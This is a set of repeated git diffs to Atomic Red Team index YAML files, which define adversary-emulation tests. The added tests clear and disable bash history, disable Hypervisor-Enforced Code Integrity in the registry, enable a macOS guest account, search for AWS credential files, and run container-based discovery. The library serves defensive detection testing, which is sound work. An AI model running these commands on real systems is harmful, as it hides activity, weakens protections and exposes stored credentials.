| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses](../../T1562/T1562.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
| | PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
|
||||
|
||||
@@ -7862,6 +7862,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -53461,7 +53462,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7800,7 +7800,45 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
atomic_tests: []
|
||||
identifier: T1612
|
||||
atomic_tests:
|
||||
- name: Build Image On Host
|
||||
auto_generated_guid: 2db30061-589d-409b-b125-7b473944f9b3
|
||||
description: Adversaries may build a container image directly on a host to bypass
|
||||
defenses that monitor for the retrieval of malicious images from a public
|
||||
registry. An adversary may take advantage of that build API to build a custom
|
||||
image on the host that includes malware downloaded from their C2 server, and
|
||||
then they then may utilize Deploy Container using that custom image.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1612 $PathtoAtomicsFolder/T1612/src/
|
||||
docker run --name t1612_container -d -t t1612
|
||||
docker exec t1612_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1612_container
|
||||
docker rmi -f t1612
|
||||
name: sh
|
||||
T1055.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -26814,6 +26852,10 @@ execution:
|
||||
description: Command to run
|
||||
type: string
|
||||
default: uname
|
||||
path:
|
||||
description: Path to busybox.yaml file
|
||||
type: string
|
||||
default: "$PathtoAtomicsFolder/T1609/src/busybox.yaml"
|
||||
dependencies:
|
||||
- description: 'kubectl must be installed
|
||||
|
||||
@@ -26826,7 +26868,9 @@ execution:
|
||||
'
|
||||
executor:
|
||||
command: |
|
||||
kubectl create -f src/busybox.yaml -n #{namespace}
|
||||
kubectl create -f #{path} -n #{namespace}
|
||||
# wait 3 seconds for the instance to come up
|
||||
sleep 3
|
||||
kubectl exec -n #{namespace} busybox -- #{command}
|
||||
cleanup_command: 'kubectl delete pod busybox -n #{namespace}
|
||||
|
||||
@@ -52536,7 +52580,44 @@ discovery:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
identifier: T1069.001
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Permission Groups Discovery for Containers- Local Groups
|
||||
auto_generated_guid: 007d7aa4-8c4d-4f55-ba6a-7c965d51219c
|
||||
description: Attackers may try to obtain a list of services that are operating
|
||||
on remote hosts and local network infrastructure devices, in order to identify
|
||||
potential vulnerabilities that can be exploited through remote software attacks.
|
||||
They typically use tools to conduct port and vulnerability scans in order
|
||||
to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1069 $PathtoAtomicsFolder/T1069.001/src/
|
||||
docker run --name t1069_container -d -t t1069
|
||||
docker exec t1069_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1069_container
|
||||
docker rmi -f t1069
|
||||
name: sh
|
||||
T1201:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -53086,7 +53167,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
@@ -53102,7 +53183,44 @@ discovery:
|
||||
x_mitre_attack_spec_version: 2.1.0
|
||||
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
identifier: T1046
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: Network Service Discovery for Containers
|
||||
auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
|
||||
description: Attackers may try to obtain a list of services that are operating
|
||||
on remote hosts and local network infrastructure devices, in order to identify
|
||||
potential vulnerabilities that can be exploited through remote software attacks.
|
||||
They typically use tools to conduct port and vulnerability scans in order
|
||||
to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
|
||||
docker run --name t1046_container -d -t t1046
|
||||
docker exec t1046_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1046_container
|
||||
docker rmi -f t1046
|
||||
name: sh
|
||||
T1518:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52637,7 +52638,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52481,7 +52482,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52818,7 +52819,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -53136,7 +53137,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
@@ -7766,6 +7766,7 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
identifier: T1612
|
||||
atomic_tests: []
|
||||
T1055.002:
|
||||
technique:
|
||||
@@ -52637,7 +52638,7 @@ discovery:
|
||||
macOS APT Activity Bradley)"
|
||||
modified: '2022-04-20T16:05:30.960Z'
|
||||
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
name: Network Service Scanning
|
||||
name: Network Service Discovery
|
||||
x_mitre_detection: |-
|
||||
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
|
||||
|
||||
|
||||
+339
-3
@@ -12084,6 +12084,17 @@ defense-evasion:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1183:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -15268,7 +15279,45 @@ defense-evasion:
|
||||
x_mitre_permissions_required:
|
||||
- User
|
||||
- root
|
||||
atomic_tests: []
|
||||
identifier: T1612
|
||||
atomic_tests:
|
||||
- name: Build Image On Host
|
||||
auto_generated_guid: 2db30061-589d-409b-b125-7b473944f9b3
|
||||
description: Adversaries may build a container image directly on a host to bypass
|
||||
defenses that monitor for the retrieval of malicious images from a public
|
||||
registry. An adversary may take advantage of that build API to build a custom
|
||||
image on the host that includes malware downloaded from their C2 server, and
|
||||
then they then may utilize Deploy Container using that custom image.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1612 $PathtoAtomicsFolder/T1612/src/
|
||||
docker run --name t1612_container -d -t t1612
|
||||
docker exec t1612_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1612_container
|
||||
docker rmi -f t1612
|
||||
name: sh
|
||||
T1055.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -16567,6 +16616,115 @@ defense-evasion:
|
||||
3. ls
|
||||
4. whoami > recon.txt
|
||||
name: manual
|
||||
- name: Clear bash history
|
||||
auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
|
||||
description: "An attacker may clear the bash history cache and the history file
|
||||
as their last act before logging off to remove the record of their command
|
||||
line activities. \n\nIn this test we use the $HISTFILE variable throughout
|
||||
to 1. confirms the $HISTFILE variable is set 2. echo \"\" into it 3..5 confirm
|
||||
the file is empty 6 clear the history cache 7. confirm the history cache is
|
||||
empty. This is when the attacker would logoff.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE;
|
||||
fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE
|
||||
is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif
|
||||
[ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n"
|
||||
cleanup_command: "mv -f $HISTFILE.OLD $HISTFILE \n"
|
||||
- name: Setting the HISTCONTROL environment variable
|
||||
auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
|
||||
description: "An attacker may exploit the space before a command (e.g. \" ls\")
|
||||
or the duplicate command suppression feature in Bash history to prevent their
|
||||
commands from being recorded in the history file or to obscure the order of
|
||||
commands used. \n\nIn this test we 1. sets $HISTCONTROL to ignoreboth 2. clears
|
||||
the history cache 3. executes ls -la with a space in-front of it 4. confirms
|
||||
that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups
|
||||
6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms
|
||||
that their is only one command in history\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\"
|
||||
]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE
|
||||
# \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls
|
||||
-la is not in history cache\"; fi\n# -> ls -la is not in history cache\nif
|
||||
[ \"$HISTCONTROL\" != \"erasedups\" ]; then export HISTCONTROL=\"erasedups\";
|
||||
fi\nhistory -c \nls -la $HISTFILE\nls -la $HISTFILE\nls -la $HISTFILE\nif
|
||||
[ $(history |wc -l) -eq 2 ]; then echo \"Their is only one entry for ls
|
||||
-la $HISTFILE\"; fi\n"
|
||||
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILESIZE environment variable
|
||||
auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
|
||||
description: |
|
||||
An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILESIZE)
|
||||
echo $HISTFILESIZE
|
||||
export HISTFILESIZE=0
|
||||
if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
|
||||
# -> $HISTFILESIZE is zero
|
||||
cleanup_command: 'export HISTCONTROL=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTFILE environment variable
|
||||
auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
|
||||
description: |
|
||||
An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
TEST=$(echo $HISTFILE)
|
||||
echo $HISTFILE
|
||||
export HISTFILE="/dev/null"
|
||||
if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
|
||||
# -> $HISTFILE is /dev/null
|
||||
cleanup_command: 'export HISTFILE=$(echo $TEST)
|
||||
|
||||
'
|
||||
- name: Setting the HISTIGNORE environment variable
|
||||
auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
|
||||
description: "An Adversary may take advantage of the HISTIGNORE environment
|
||||
variable either to ignore particular commands or all commands. \n\nIn this
|
||||
test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this
|
||||
history cache 3..4 execute ls commands 5. confirm that the ls commands are
|
||||
not in the history cache 6. unset HISTIGNORE variable 7.. same again, but
|
||||
ignoring ALL commands.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\";
|
||||
else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\";
|
||||
fi\n# -> $HISTIGNORE = ls*:rm*:ssh*\nhistory -c \nls -la $HISTFILE\nls -la
|
||||
~/.bash_logout\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls commands
|
||||
are not in history\"; fi\n# -> ls commands are not in history\nunset HISTIGNORE\n\nif
|
||||
((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export
|
||||
HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE
|
||||
= *\nhistory -c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo
|
||||
\"History cache is empty\"; fi\n# -> History cache is empty\n"
|
||||
cleanup_command: 'unset HISTIGNORE
|
||||
|
||||
'
|
||||
T1497.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -18946,6 +19104,52 @@ defense-evasion:
|
||||
sync
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Disable Hypervisor-Enforced Code Integrity (HVCI)
|
||||
auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
|
||||
description: "This test disables Hypervisor-Enforced Code Integrity (HVCI) by
|
||||
setting the registry key HKLM:\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity
|
||||
\"Enabled\" value to \"0\".\nThe pre-req needs to be ran in order to setup
|
||||
HVCI and have it enabled. \nWe do not recommend running this in production.\n[Black
|
||||
Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)\n[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: 'HVCI must be enabled
|
||||
|
||||
'
|
||||
prereq_command: 'if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity
|
||||
2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures
|
||||
2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
|
||||
/v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query
|
||||
"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query
|
||||
"HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1
|
||||
}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
|
||||
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
|
||||
executor:
|
||||
command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
|
||||
/v "Enabled" /t REG_DWORD /d 0 /f
|
||||
|
||||
'
|
||||
cleanup_command: |
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
|
||||
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1601:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -33683,6 +33887,17 @@ privilege-escalation:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1547.003:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -46394,6 +46609,10 @@ execution:
|
||||
description: Command to run
|
||||
type: string
|
||||
default: uname
|
||||
path:
|
||||
description: Path to busybox.yaml file
|
||||
type: string
|
||||
default: "$PathtoAtomicsFolder/T1609/src/busybox.yaml"
|
||||
dependencies:
|
||||
- description: 'kubectl must be installed
|
||||
|
||||
@@ -46406,7 +46625,9 @@ execution:
|
||||
'
|
||||
executor:
|
||||
command: |
|
||||
kubectl create -f src/busybox.yaml -n #{namespace}
|
||||
kubectl create -f #{path} -n #{namespace}
|
||||
# wait 3 seconds for the instance to come up
|
||||
sleep 3
|
||||
kubectl exec -n #{namespace} busybox -- #{command}
|
||||
cleanup_command: 'kubectl delete pod busybox -n #{namespace}
|
||||
|
||||
@@ -56329,6 +56550,17 @@ persistence:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Enable Guest Account on macOS
|
||||
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
|
||||
description: This test enables the guest account on macOS using sysadminctl
|
||||
utility.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
command: sudo sysadminctl -guestAccount on
|
||||
cleanup_command: sudo sysadminctl -guestAccount off
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1547.003:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -81627,6 +81859,25 @@ credential-access:
|
||||
- Access to files
|
||||
identifier: T1552.001
|
||||
atomic_tests:
|
||||
- name: Find AWS credentials
|
||||
auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
|
||||
description: 'Find local AWS credentials from file, defaults to using / as the
|
||||
look path.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
input_arguments:
|
||||
file_path:
|
||||
description: Path to search
|
||||
type: string
|
||||
default: "/"
|
||||
executor:
|
||||
command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Extract Browser and System credentials with LaZagne
|
||||
auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79
|
||||
description: "[LaZagne Source](https://github.com/AlessandroZ/LaZagne)\n"
|
||||
@@ -90382,6 +90633,43 @@ discovery:
|
||||
|
||||
'
|
||||
name: powershell
|
||||
- name: Permission Groups Discovery for Containers- Local Groups
|
||||
auto_generated_guid: 007d7aa4-8c4d-4f55-ba6a-7c965d51219c
|
||||
description: Attackers may try to obtain a list of services that are operating
|
||||
on remote hosts and local network infrastructure devices, in order to identify
|
||||
potential vulnerabilities that can be exploited through remote software attacks.
|
||||
They typically use tools to conduct port and vulnerability scans in order
|
||||
to obtain this information.
|
||||
supported_platforms:
|
||||
- containers
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: Verify docker is installed.
|
||||
prereq_command: 'which docker
|
||||
|
||||
'
|
||||
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
|
||||
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
|
||||
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
|
||||
echo "Docker installed"; fi
|
||||
|
||||
'
|
||||
- description: Verify docker service is running.
|
||||
prereq_command: 'sudo systemctl status docker --no-pager
|
||||
|
||||
'
|
||||
get_prereq_command: 'sudo systemctl start docker
|
||||
|
||||
'
|
||||
executor:
|
||||
command: |-
|
||||
docker build -t t1069 $PathtoAtomicsFolder/T1069.001/src/
|
||||
docker run --name t1069_container -d -t t1069
|
||||
docker exec t1069_container ./test.sh
|
||||
cleanup_command: |-
|
||||
docker stop t1069_container
|
||||
